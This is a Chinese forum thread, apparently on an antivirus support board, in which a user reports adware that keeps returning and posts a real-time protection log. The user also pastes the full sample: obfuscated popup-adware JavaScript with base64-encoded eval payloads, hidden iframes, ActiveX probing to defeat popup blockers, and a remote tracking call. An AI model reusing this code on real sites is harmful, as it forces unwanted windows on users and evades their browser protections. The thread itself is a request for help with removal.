顽固牛皮廯，反复查杀，无法根除！

类型：
js.iframe.adware.b

描述：
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎：
360云查杀引擎

文件路径：
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SY7728N3\spop1[1].js
[img][/img]
[img][/img]

您好，

您使用的是全盘扫描查杀吗？方便的话，可以提供一下具体的病毒文件样本，我们分析下。

是广告弹窗类病毒，不用很担心。

360杀毒实时防护日志

时间                    防护说明                                                                  处理结果                                                        文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2015-12-21 23:28:09     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\h050hdl0\spop1[4].js
2015-12-21 23:19:18     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\9qr0a3ql\spop1[2].js
2015-12-21 22:20:01     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\9qr0a3ql\spop1[1].js
2015-12-21 21:50:28     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\h050hdl0\spop1[3].js
2015-12-21 20:43:26     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\h050hdl0\spop1[2].js
2015-12-21 19:42:57     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\h050hdl0\spop1[1].js
2015-12-21 02:13:26     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\sy7728n3\spop1[2].js
2015-12-21 02:13:15     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\sy7728n3\spop1[1].js
2015-12-21 02:04:51     修改 默认浏览器主页                                                            自动阻止                                                    C:\Windows\System32\rundll32.exe
2015-12-21 01:43:47     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\h050hdl0\spop1[2].js
2015-12-21 01:26:53     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\9qr0a3ql\spop1[1].js
2015-12-21 00:32:38     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\0055mnsv\spop1[2].js
2015-12-21 00:32:16     修改 浏览器默认下载工具                                                          已允许                                                      C:\Windows\System32\regsvr32.exe
2015-12-21 00:15:32     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\0055mnsv\spop1[1].js
2015-12-20 08:41:29     发现木马：HEUR/QVM11.1.Malware.Gen                                         已清除                                                      C:\Windows\soft\baofeng\AUTO.exe
2015-12-20 08:41:22     恶意软件(HEUR/QVM11.1.Malware.Gen)MD5:d59e24cf88a7bb0d9ad7fa4e8b72582a    已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\windows\soft\baofeng\auto.exe
2015-12-20 08:41:21     进程创建                                                                  自动阻止                                                    C:\Windows\soft\baofeng\AUTO.exe
2015-12-20 08:09:19     恶意软件(js.iframe.adware.b)                                              已删除此文件，如果您发现误删，可从隔离区恢复此文件。        c:\users\administrator\appdata\local\microsoft\windows\temporary internet files\content.ie5\9qr0a3ql\spop1[1].js
2015-12-20 08:04:46     修改 默认浏览器主页                                                            自动阻止                                                    C:\Windows\System32\rundll32.exe
2015-12-20 04:37:08     发现木马：Win32/Trojan.f59                                                 已清除                                                      C:\Windows\system\System Idle Proces.exe
2015-12-20 04:36:52     修改网页                                                                  自动阻止                                                    C:\Program Files\Internet Explorer\iexplore.exe
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

我该怎么解决，反复打开此网站，不胜其烦哪！！！！

样本如下：
<!--

    var oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)?wo.pw:wo; } function fV11() {return fV6(vV1);} function fV5(x) { return true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array; var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var n=tn.getTime()+'N'+c; cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn=""; cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;}; return c } function fV13() { oV5=oV1.document; vWA=new Array; fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout; vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0; isG=fV31=fV32=fV35=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0; fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0; if (navigator.userAgent) { fV35=!fV20?(navigator.userAgent.indexOf('Firefox/2')>0):0; } oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uOmFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZlYxLDUsdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBzdHlsZT0iZGlzcGxheTppbmxpbmUiIGlkPSJvVjEwIj48L2Rpdj4=')); } function debug() {void(0)} function fV6(input) { var o = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o + String.fromCharCode(chr2); } if (enc4 != 64) { o = o + String.fromCharCode(chr3); } } while (i < input.length); return o; } function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow; oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200); fV4(t); } function fV17() { if (--fV25<1) { fV25=25; var t=fV3('fV12()'); return; } var x=fV3('fV17()',250); oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x); oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange'); } function fV16() { if (fV34 || fV21) { oV5.all['oV6'].fireEvent('onchange'); } else { z=createPopup(); oV8=z.document.body; oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } } function fV19(v) { if (oV5.getElementById('oV10')) { oV5.getElementById('oV10').innerHTML=v; } else { var o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility = "visible"; oV5.body.appendChild(o); } } function fV23() { fV8(fV1,4); } function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0]; var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { fV4(x); fV25=1; eval(fV6('d28ucHc9by5ET00uU2NyaXB0Lm9wZW4od28ubG9jYXRpb24sJycsd28udik7')); if (wo.pw || fV34) { fV9(wo,4); } else { var t=fV3('fV33()',500); eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbmVycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3NlKClcIiw1MCk7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXCIsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZWxwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0OjUwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KTsg")); fV3('fV23()'); fV4(t); } } } function fV28() { fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMjU9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } function fV26() { fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5OmhpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YXNjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20; fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV32=1}; o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD'; o.onreadystatechange=function(){fV32=0}; } function fV29() { fV3('fV31?fV28():fV33()'); var o=document.createElement('object'); o.onreadystatechange=function(){fV31=1}; o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC'; o.onreadystatechange=function(){fV31=0}; } function fV33() { fV3('isG?fV16():fV26();'); var o=document.createElement('object'); o.onreadystatechange=function(){isG=1}; o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB'; o.onreadystatechange=function(){isG=0}; } function fV7() { oV5.body.onclick=function(){fV8(oV1.open,3)}; if (oV5.createElement) { fV24=oV5.getElementById; if (fV34) fV21=0; if (fV20) { if (fV21) { fV30(); } else { fV33(); } } else { if (!fV35) { out='<embed style="position:absolute; top:0px" swliveconnect="true" src="http://'+khost+'/cmp2.swf" width="1" height="1">'; fV19(out); } if (!oV5.all) { x=oV5.getElementById('oV6'); x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var i=0;i < vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i]; wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i]; if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0; if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==4) var t=fV3('fV33()',500); if (s==5 && isG) var t=fV3('fV26()',200); oV1.onerror=fV5; if (wo.pw) { if (wo.f==-1) { wo.pw.blur(); fV34?oV5.focus():fV2(); } else { wo.pw.focus(); } wo.s=2; fV4(t); eval(fV6('Y2g9dHJ1ZTsgaWYgKHdpbmRvdy5hb19saWMpIHtjaD13by5sb2NhdGlvbi5pbmRleE9mKCdjYXNhbGVtZWRpYS5jb20nKT09MDt9IGVsc2UgeyBjaD10cnVlIH0NCmlmIChjaCkgew0KICBpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KSB7DQogICAgdmFyIHg9bmV3IEltYWdlKCk7DQogICAgeC5zcmM9J2h0dHA6Ly93d3cuYWRvdXRwdXQuY29tL3ZlcnNpb24yL2hpdC5**0/dHlwZT0nICsgczsNCiAgfQ0KfQ==')); oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20) {fV7();return;} wo=vWA[w]; fV9(wo); }

var casalef='width='+ffwidth+',height='+ffheight+',toolbar=1,location=1,titlebar=1,menubar=1,scrollbars=1,resizable=1,directories=1,status=1';

var l = 0;        //(screen.width -  800) / 2 ;
var t = 0;        //(screen.height - 600) / 2 ;
  
var todopop = fStart(paypopupURL,'',casalef+',left='+l+',top='+t);
todopop.blur();       


//write for unonload
function openwin2() {
window.open(paypopupURL,'','').blur();
window.focus();
}

poped = getCookie( popcookies );
if( (poped == null)||(poped == ''))
{
    setCookie( popcookies, "yes", pophour );


        setTimeout("focus()",300);
        setTimeout("focus()",1000);
        setTimeout("focus()",3000);
        setTimeout("focus()",5000);

}
//-->